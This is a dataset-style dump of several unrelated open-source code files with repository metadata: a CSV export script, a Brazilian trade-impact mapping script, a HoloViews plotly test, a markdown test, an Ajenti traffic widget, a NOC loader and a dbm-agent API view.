# QUOTE_NONNUMERIC doesn't work because it tries to convert dates are floats
# consequently, all fields are output quoted
# not a big deal for oracle, which has optionally enclosed by double quotes parameter
with open(fn_out,'wb') as fout:
out = csv.writer(fout, doublequote=True, quoting=csv.QUOTE_NONNUMERIC,
lineterminator=oracle_newrow + '\r\n')
for row in reader:
out.writerow(row)
if reader.line_num % 100000 == 0:
print('Finished {} million lines.'.format(reader.line_num / 1000000))
# Summarise output
print('\n'+'~'*40)
print('Merging complete\n')
print('Number of rows processed: {}'.format(reader.line_num))
print('New file created: {}'.format(fout.name))
print('~'*40)
if __name__ == "__main__":
main(sys.argv[1:])
|
69d327c83e0b8bcd593eb4b27fd7b8bcf866e479
|
3aad16c9b4a2f903e74d0c3fadd033f2f8f3db30
|
/trademap/mapa_final.py
|
15c16c87b8f4cd37330d7f76bd788842f75f4b06
|
[] |
no_license
|
omercadopopular/cgoes
|
bae7617a6714ccb60f6854067d44e21e4459d6d4
|
55a010da4a47ba8fc9c28d04f85261676faa169b
|
refs/heads/master
| 2022-12-27T22:14:16.665593
| 2022-12-16T01:46:33
| 2022-12-16T01:46:33
| 58,074,789
| 143
| 59
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,307
|
py
|
mapa_final.py
|
# -*- coding: utf-8 -*-
"""
PROJETO: "Uma Estratégia De Antecipação Dos Impactos Regionais E Setoriais
Da Abertura Comercial Brasileira Sobre O Emprego E Requalificação Da População Afetada"
EQUIPE DO PROJETO: Carlos Góes (SAE), Eduardo Leoni (SAE),
Luís Montes (SAE) e Alexandre Messa (Núcleo Econômico da CAMEX).
AUTOR DESTE CÓDIGO: Carlos Góes, SAE/Presidência da República
DATA: 24/07/2017
"""
import pandas as pd
import matplotlib.pyplot as plt
import geopandas as gpd
import os
#####################################
# 1. Retrieve Databases
#####################################
data_mun = "K:\\Notas Técnicas\\Abertura\\data\\Econometria\\results\\modelresult_mun.json"
shp_mun = "K:/Notas Técnicas/Abertura/data/mapas/BR/BRMUE250GC_SIR.shp"
data_micro = "K:\\Notas Técnicas\\Abertura\\data\\Econometria\\results\\modelresult_micro.json"
shp_micro= "K:/Notas Técnicas/Abertura/data/mapas/BR/BRMIE250GC_SIR.shp"
datartr_micro="k:/Notas Técnicas/Abertura/data/Econometria/data/rtr.csv"
# Importar dados
modelresult_mun = pd.read_json(path_or_buf=data_mun)
modelresult_micro = pd.read_json(path_or_buf=data_micro)
os.chdir(os.path.dirname(datartr_micro))
rtr_micro = pd.read_csv(os.path.basename(datartr_micro))
# Importar SHPs
sf_mun = gpd.read_file(shp_mun)
sf_micro = gpd.read_file(shp_micro)
#####################################
# 2. Adjust and merge databases
#####################################
# Ajustar código do município ou microregião
sf_mun['CD_GEOCMU'] = [int(item[:-1]) for item in sf_mun['CD_GEOCMU']]
sf_micro['CD_GEOCMI'] = [int(item) for item in sf_micro['CD_GEOCMI']]
rtr_micro['rtr'] = [item * 100 for item in rtr_micro['rtr']]
# Mesclar bases de dado
sf_mun = sf_mun.set_index("CD_GEOCMU").join(modelresult_mun.set_index("municipio"), how="left").reset_index(drop=False)
modelresult_micro = pd.merge(rtr_micro, modelresult_micro, left_on="microrregiao", right_on="microrregiao")
sf_micro = sf_micro.set_index("CD_GEOCMI").join(modelresult_micro.set_index("microrregiao"), how="left").reset_index(drop=False, col_fill="CD_GEOCMI")
simplifytolerance = 0.05
sf_micro['geometry'] = sf_micro['geometry'].simplify(simplifytolerance)
#####################################
# 3. Plot Maps
#####################################
## Changes
groups = ["pop_change_mun_final","pop_change_mun_final_pos","pop_change_mun_final_neg"]
for group in groups:
fig, axes = plt.subplots(figsize=(10, 10))
mymap = sf_micro.plot(ax=axes,
column=group,
linewidth=0.05,
cmap="seismic_r",
vmin = -2,
vmax = 2)
plt.axis('off')
plt.tight_layout()
cax = fig.add_axes([0.9, 0.1, 0.03, 0.8])
sm = plt.cm.ScalarMappable(cmap="seismic_r", norm=plt.Normalize(vmin = -2, vmax = 2))
sm._A = []
fig.colorbar(sm, cax=cax)
plt.show()
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas/pdf/mapa_micro" + group + ".pdf")
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas/svg/mapa_micro" + group + ".svg")
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas/png/mapa_micro" + group + ".png", dpi=600, transparent=False)
## Tariff
fig, axes = plt.subplots(figsize=(10, 10))
mymap = sf_micro.plot(ax=axes,
column="rtr",
linewidth=0.05,
cmap="afmhot_r",
vmin = 0,
vmax = 20)
plt.axis('off')
plt.tight_layout()
cax = fig.add_axes([0.9, 0.1, 0.03, 0.8])
sm = plt.cm.ScalarMappable(cmap="afmhot_r", norm=plt.Normalize(vmin = 0, vmax = 20))
sm._A = []
fig.colorbar(sm, cax=cax)
plt.show()
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas/pdf/mapa_micro_tarifa.pdf")
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas/svg/mapa_micro_tarifa.svg")
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas/png/mapa_micro_tarifa.png", dpi=600, transparent=False)
#####################################
# 4. Loop for State Maps
#####################################
estados = sf_micro['UFSigla'].unique()
for estado in estados:
sf_mini = sf_micro[ sf_micro['UFSigla'] == estado ]
fig, axes = plt.subplots(figsize=(10, 10))
mymap = sf_mini.plot(ax=axes,
column="pop_change_mun_final",
linewidth=0.02,
cmap="seismic_r",
vmin = -2,
vmax = 2)
plt.axis('off')
plt.title(str(estado) + ': Variação Esperada no Emprego 10 anos após liberalização comercial, por microrregião')
plt.tight_layout()
cax = fig.add_axes([0.9, 0.1, 0.03, 0.8])
sm = plt.cm.ScalarMappable(cmap="seismic_r", norm=plt.Normalize(vmin = -3, vmax = 3))
sm._A = []
fig.colorbar(sm, cax=cax)
plt.show()
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas/pdf/mapa_" + estado + ".pdf")
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas/svg/mapa_" + estado + ".svg")
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas//png//mapa_" + estado + ".png", dpi=600, transparent=False)
|
fc5e089fbfa95fe271459d6b37724eaf6ecfc9ab
|
4658aa41017b2e6da830f1e879774e4a7296c314
|
/holoviews/tests/plotting/plotly/test_path3d.py
|
af96c07f5c3379b25610fa05bc0789faf1fc2ea1
|
[
"BSD-3-Clause"
] |
permissive
|
holoviz/holoviews
|
3f133e572933c94cedad7bae6fb6d071152842fc
|
e3dee5443dad84b507734c0a3d2bba8ec44f5653
|
refs/heads/main
| 2023-09-03T05:08:42.682432
| 2023-08-28T20:40:36
| 2023-08-28T20:40:36
| 19,542,768
| 1,223
| 223
|
BSD-3-Clause
| 2023-09-14T18:15:53
| 2014-05-07T16:59:22
|
Python
|
UTF-8
|
Python
| false
| false
| 2,507
|
py
|
test_path3d.py
|
import numpy as np
from holoviews.element import Path3D
from .test_plot import TestPlotlyPlot
class TestPath3DPlot(TestPlotlyPlot):
def test_path3D_state(self):
path3D = Path3D([(0, 1, 0), (1, 2, 1), (2, 3, 2)])
state = self._get_plot_state(path3D)
self.assertEqual(state['data'][0]['x'], np.array([0, 1, 2]))
self.assertEqual(state['data'][0]['y'], np.array([1, 2, 3]))
self.assertEqual(state['data'][0]['mode'], 'lines')
self.assertEqual(state['data'][0]['type'], 'scatter3d')
self.assertEqual(state['layout']['scene']['xaxis']['range'], [0, 2])
self.assertEqual(state['layout']['scene']['yaxis']['range'], [1, 3])
self.assertEqual(state['layout']['scene']['zaxis']['range'], [0, 2])
def test_path3D_multi(self):
path3D = Path3D([[(0, 1, 0), (1, 2, 1), (2, 3, 2)], [(-1, 1, 3), (-2, 2, 4), (-3, 3, 5)]])
state = self._get_plot_state(path3D)
self.assertEqual(state['data'][0]['x'], np.array([0, 1, 2]))
self.assertEqual(state['data'][0]['y'], np.array([1, 2, 3]))
self.assertEqual(state['data'][0]['z'], np.array([0, 1, 2]))
self.assertEqual(state['data'][0]['mode'], 'lines')
self.assertEqual(state['data'][0]['type'], 'scatter3d')
self.assertEqual(state['data'][1]['x'], np.array([-1, -2, -3]))
self.assertEqual(state['data'][1]['y'], np.array([1, 2, 3]))
self.assertEqual(state['data'][1]['z'], np.array([3, 4, 5]))
self.assertEqual(state['data'][1]['mode'], 'lines')
self.assertEqual(state['data'][1]['type'], 'scatter3d')
self.assertEqual(state['layout']['scene']['xaxis']['range'], [-3, 2])
self.assertEqual(state['layout']['scene']['yaxis']['range'], [1, 3])
self.assertEqual(state['layout']['scene']['zaxis']['range'], [0, 5])
def test_path3D_multi_colors(self):
path3D = Path3D([[(0, 1, 0, 'red'), (1, 2, 1, 'red'), (2, 3, 2, 'red')],
[(-1, 1, 3, 'blue'), (-2, 2, 4, 'blue'), (-3, 3, 5, 'blue')]],
vdims='color').opts(color='color')
state = self._get_plot_state(path3D)
self.assertEqual(state['data'][0]['line']['color'], 'red')
self.assertEqual(state['data'][1]['line']['color'], 'blue')
def test_visible(self):
element = Path3D([(0, 1, 0), (1, 2, 1), (2, 3, 2)]).opts(visible=False)
state = self._get_plot_state(element)
self.assertEqual(state['data'][0]['visible'], False)
|
b7fbf48911cb0b047756a1cf73ee9e832a53d691
|
33c443346aa9309cfda431e79a2a281df8ed9bb7
|
/myblog/mdtest.py
|
cf63eda4e2a41bc9e94868dbc54b4a7b6954e719
|
[] |
no_license
|
newpanjing/myblog
|
a3b3bc25b2ee7bc33006411bf5ce5710641eed4a
|
e0dc06231fb574ff8d18c1f0751acbcf33444539
|
refs/heads/master
| 2023-04-30T07:34:41.078441
| 2022-06-03T14:25:49
| 2022-06-03T14:25:49
| 143,099,403
| 140
| 56
| null | 2023-04-21T20:32:38
| 2018-08-01T03:30:45
|
Python
|
UTF-8
|
Python
| false
| false
| 295
|
py
|
mdtest.py
|
import markdown
print(markdown.markdown('''
[TOC]
# 这是什么操作
这是一个无人机
## 后来
```python
aa=123
print(aa)
for i in range(1,100):
print(i)
```
''', extensions=[
'markdown.extensions.extra',
'markdown.extensions.codehilite',
'markdown.extensions.toc',
]))
|
89785a1feafe1eccbead9726a53fd2cfe59243a9
|
154f710627739de4c5c53716f6ee961282ac920c
|
/plugins/traffic/widget.py
|
a9ed9473729e9d295135a15efed448e3ee125bcb
|
[
"MIT"
] |
permissive
|
ajenti/ajenti
|
3bff32d6fffca13ce8fc777c9a68a70f7338bdb3
|
5ab0dd3f08d2928810d8235123bda3b071d02a97
|
refs/heads/master
| 2023-08-29T11:40:49.368067
| 2023-08-05T14:02:58
| 2023-08-05T14:02:58
| 544,208
| 4,376
| 770
|
MIT
| 2023-08-02T02:20:33
| 2010-03-03T08:04:15
|
Python
|
UTF-8
|
Python
| false
| false
| 648
|
py
|
widget.py
|
import psutil
from jadi import component
from aj.plugins.dashboard.api import Widget
@component(Widget)
class TrafficWidget(Widget):
id = 'traffic'
name = _('Traffic')
template = '/traffic:resources/partial/widget.html'
config_template = '/traffic:resources/partial/widget.config.html'
def __init__(self, context):
Widget.__init__(self, context)
def get_value(self, config):
info = psutil.net_io_counters(pernic=True).get(config.get('interface', None), None)
if not info:
return None
return {
'tx': info.bytes_sent,
'rx': info.bytes_recv,
}
|
6f6c7f7cd17de232c3560b26171767acbee2cda5
|
2337351b228818e41be3002bd38f68f77c2aa074
|
/core/etl/loader/l2domain.py
|
0b21396a6dcdee516db0ef8a287c34ea781df5bc
|
[
"BSD-3-Clause"
] |
permissive
|
nocproject/noc
|
57d40c680a1499374463e472434f9595ed6d1374
|
6e6d71574e9b9d822bec572cc629a0ea73604a59
|
refs/heads/master
| 2023-08-31T01:11:33.544573
| 2023-08-30T17:31:11
| 2023-08-30T17:31:11
| 107,815,776
| 105
| 33
|
BSD-3-Clause
| 2023-07-31T07:57:45
| 2017-10-21T21:04:33
|
Python
|
UTF-8
|
Python
| false
| false
| 600
|
py
|
l2domain.py
|
# ----------------------------------------------------------------------
# Auth Profile Loader
# ----------------------------------------------------------------------
# Copyright (C) 2007-2023 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# NOC modules
from .base import BaseLoader
from ..models.l2domain import L2Domain
from noc.vc.models.l2domain import L2Domain as L2DomainModel
class L2DomainLoader(BaseLoader):
"""
L2Domain loader
"""
name = "l2domain"
model = L2DomainModel
data_model = L2Domain
|
a77b840609119557d3875de064d415a9cd315816
|
bc95060fe849162b5d3be79380f496ecf06b2ad9
|
/dbma/core/views/dbmagentview.py
|
fc1fd883c47770fa26381081c13fb96c63002e64
|
[] |
no_license
|
Neeky/dbm-agent
|
9ac8205b0ee9e09490e0279b709bd4b4d4f7d610
|
3d92fbac91d561c91789f425330fdbb9b41f62bd
|
refs/heads/master
| 2023-08-05T06:48:17.722028
| 2023-08-01T12:49:32
| 2023-08-01T12:49:32
| 174,054,080
| 183
| 84
| null | 2023-04-11T03:44:32
| 2019-03-06T02:14:26
|
Jinja
|
UTF-8
|
Python
| false
| false
| 455
|
py
|
dbmagentview.py
|
# -*- encoding: utf-8 -*-
"""dbm-agent 内部数据接口
"""
import logging
from aiohttp import web
from dbma.core.router import routes
from dbma.version import DBM_AGENT_VESION
@routes.view("/apis/dbm-agent")
class DbmAgentView(web.View):
"""
dbm-agent http 接口实现
"""
async def get(self):
"""返回 dbm-agent 的版本号信息"""
return web.json_response({"name": "dbm-agent", "version": DBM_AGENT_VESION})
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.